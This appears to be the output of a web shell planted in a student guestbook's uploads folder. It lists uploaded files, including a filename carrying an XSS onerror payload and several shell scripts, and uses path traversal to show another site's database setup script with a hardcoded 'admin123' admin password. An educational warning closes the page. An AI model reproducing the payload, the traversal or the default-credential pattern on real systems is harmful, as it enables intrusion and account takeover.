🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../585871.klas4s23.mid-ica.nl/public_html/grotevriendelijkereus/setup_database.php

<?php
// Setup the database tables

require_once 'includes/classes/Databases.php';

// Obtain the PDO handle from the project's Database singleton.
$db = Database::getInstance();
$pdo = $db->getPDO();

// Start from a clean slate.
// NOTE(review): this is destructive -- every run deletes all existing users, tasks,
// assignments and activity logs. If this script is reachable over HTTP, anyone who
// requests it resets the database; restrict it to the command line or remove it after
// installation -- confirm how it is deployed.
// Tables that hold foreign keys are listed before the tables they reference.
foreach (['task_assignments', 'tasks', 'activity_logs', 'users'] as $tableName) {
    // $tableName only ever comes from the fixed list above, never from request input.
    $pdo->exec("DROP TABLE IF EXISTS " . $tableName);
}

// users: one row per account.
// - password_hash holds a password hash, never the password itself; 255 characters
//   leaves room for longer hash formats.
// - New rows default to role 'volunteer' and is_approved = 0, so an account gets
//   admin rights or approval only when those columns are set explicitly.
// - NOTE(review): reset_token is stored as written; if the application stores the raw
//   token here, consider storing a hash of it instead -- confirm against the reset flow.
// The nowdoc does no variable interpolation; it starts with an empty line so the
// statement text is the same as the inline string it replaces.
$usersTableSql = <<<'SQL'

CREATE TABLE IF NOT EXISTS users (
    id INT AUTO_INCREMENT PRIMARY KEY,
    first_name VARCHAR(50) NOT NULL,
    last_name VARCHAR(50) NOT NULL,
    email VARCHAR(100) NOT NULL UNIQUE,
    password_hash VARCHAR(255) NOT NULL,
    role ENUM('admin', 'volunteer') DEFAULT 'volunteer',
    is_approved TINYINT(1) DEFAULT 0,
    reset_token VARCHAR(100) NULL,
    reset_expires DATETIME NULL,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
)
SQL;
$pdo->exec($usersTableSql);

// tasks: one row per volunteer shift (date, time window, location, head count).
// The recurrence columns (is_recurring, recurring_series_id, recurrence_type) are
// optional; end_date is nullable as well.
// The nowdoc does no variable interpolation; it starts with an empty line so the
// statement text is the same as the inline string it replaces.
$tasksTableSql = <<<'SQL'

CREATE TABLE IF NOT EXISTS tasks (
    id INT AUTO_INCREMENT PRIMARY KEY,
    title VARCHAR(100) NOT NULL,
    description TEXT,
    date DATE NOT NULL,
    end_date DATE NULL,
    start_time TIME NOT NULL,
    end_time TIME NOT NULL,
    location VARCHAR(100) NOT NULL,
    volunteers_needed INT NOT NULL DEFAULT 1,
    is_recurring TINYINT(1) DEFAULT 0,
    recurring_series_id VARCHAR(50) NULL,
    recurrence_type ENUM('daily', 'weekly', 'monthly') NULL,
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
)
SQL;
$pdo->exec($tasksTableSql);

// task_assignments: links a user to a task.
// - Both foreign keys cascade, so deleting a task or a user also deletes its assignments.
// - unique_assignment prevents the same user from being assigned to one task twice.
// - status defaults to 'confirmed', not 'pending'.
// The nowdoc does no variable interpolation; it starts with an empty line so the
// statement text is the same as the inline string it replaces.
$assignmentsTableSql = <<<'SQL'

CREATE TABLE IF NOT EXISTS task_assignments (
    id INT AUTO_INCREMENT PRIMARY KEY,
    task_id INT NOT NULL,
    user_id INT NOT NULL,
    status ENUM('pending', 'confirmed', 'rejected') DEFAULT 'confirmed',
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
    FOREIGN KEY (task_id) REFERENCES tasks(id) ON DELETE CASCADE,
    FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE,
    UNIQUE KEY unique_assignment (task_id, user_id)
)
SQL;
$pdo->exec($assignmentsTableSql);

// activity_logs: audit trail of user actions.
// - user_id is nullable and set to NULL when the user is deleted, so log rows outlive
//   the account they refer to.
// - ip_address is VARCHAR(45), presumably sized for the text form of an IPv6 address.
// The nowdoc does no variable interpolation; it starts with an empty line so the
// statement text is the same as the inline string it replaces.
$activityLogsTableSql = <<<'SQL'

CREATE TABLE IF NOT EXISTS activity_logs (
    id INT AUTO_INCREMENT PRIMARY KEY,
    user_id INT,
    action VARCHAR(50) NOT NULL,
    description TEXT,
    ip_address VARCHAR(45),
    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE SET NULL
)
SQL;
$pdo->exec($activityLogsTableSql);

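// Create default admin user if it doesn't exist.
// The (int) cast makes the strict comparison below work whether the driver returns the
// count as a string or as an integer.
$checkAdmin = (int) $pdo->query("SELECT COUNT(*) FROM users WHERE role = 'admin'")->fetchColumn();

if ($checkAdmin === 0) {
    // NOTE(review): 'admin123' is a fixed, guessable password, and it is echoed into the
    // response below. Change it immediately after setup; better, generate a random
    // initial password or require the operator to supply one.
    $passwordHash = password_hash('admin123', PASSWORD_DEFAULT);

    // Bind every value as a parameter instead of interpolating the hash into the SQL text.
    $insertAdmin = $pdo->prepare(
        "INSERT INTO users (first_name, last_name, email, password_hash, role, is_approved)
         VALUES (?, ?, ?, ?, ?, ?)"
    );
    $insertAdmin->execute(['Admin', 'User', 'admin@degoudenschoen.nl', $passwordHash, 'admin', 1]);

    echo "Default admin user created: admin@degoudenschoen.nl / admin123";
}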

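// Seed three sample tasks, but only when the tasks table is empty.
// The (int) cast makes the strict comparison work whether the driver returns the count
// as a string or as an integer.
$taskCount = (int) $pdo->query("SELECT COUNT(*) FROM tasks")->fetchColumn();
if ($taskCount === 0) {
    // Sample data; dates are relative to the day the script runs.
    $sampleTasks = [
        [
            'title' => 'Kantinedienst',
            'description' => 'Help met het serveren van drankjes en snacks in de kantine tijdens de wedstrijden. Je werkt samen met een ervaren kantinemedewerker en zorgt voor een gezellige sfeer.',
            'date' => date('Y-m-d', strtotime('+3 days')),
            'start_time' => '14:00:00',
            'end_time' => '18:00:00',
            'location' => 'Clubhuis',
            'volunteers_needed' => 2,
        ],
        [
            // Title repaired: the 'ö' was shown as a mis-decoded two-character sequence.
            'title' => 'Wedstrijdcoördinatie',
            'description' => 'Zorg voor een soepel verloop van de wedstrijden. Ontvang bezoekende teams, wijs kleedkamers toe en houd het wedstrijdschema in de gaten.',
            'date' => date('Y-m-d', strtotime('+5 days')),
            'start_time' => '09:00:00',
            'end_time' => '13:00:00',
            'location' => 'Veld 1',
            'volunteers_needed' => 3,
        ],
        [
            'title' => 'Schoonmaakploeg',
            'description' => 'Help mee om de kleedkamers en kantine schoon te maken na een drukke wedstrijddag.',
            'date' => date('Y-m-d', strtotime('+7 days')),
            'start_time' => '18:00:00',
            'end_time' => '20:00:00',
            'location' => 'Clubhuis en kleedkamers',
            'volunteers_needed' => 4,
        ],
    ];

    // One prepared statement, executed once per task; values are bound, not interpolated.
    $stmt = $pdo->prepare("INSERT INTO tasks (title, description, date, start_time, end_time, location, volunteers_needed) 
                          VALUES (?, ?, ?, ?, ?, ?, ?)");

    foreach ($sampleTasks as $task) {
        // The order of the bound values must match the column list in the INSERT.
        $stmt->execute([
            $task['title'],
            $task['description'],
            $task['date'],
            $task['start_time'],
            $task['end_time'],
            $task['location'],
            $task['volunteers_needed'],
        ]);
    }

    echo "<br>Sample tasks created.";
}

// The messages are written as HTML (<br>), i.e. the script expects to be run in a browser.
echo "<br>Database setup completed successfully!";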

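⚠️ Educational Warning: This demonstrates a web shell: a script that runs from the site's uploads directory with the web server's permissions. The underlying weakness appears to be an upload feature that stores .php files in a location where the server executes them; as the file view above shows, this already exposes the source of a different site on the same host. Storing uploads outside the web root, or disabling script execution in the uploads directory, removes that path. In a real attack, this could allow complete server compromise!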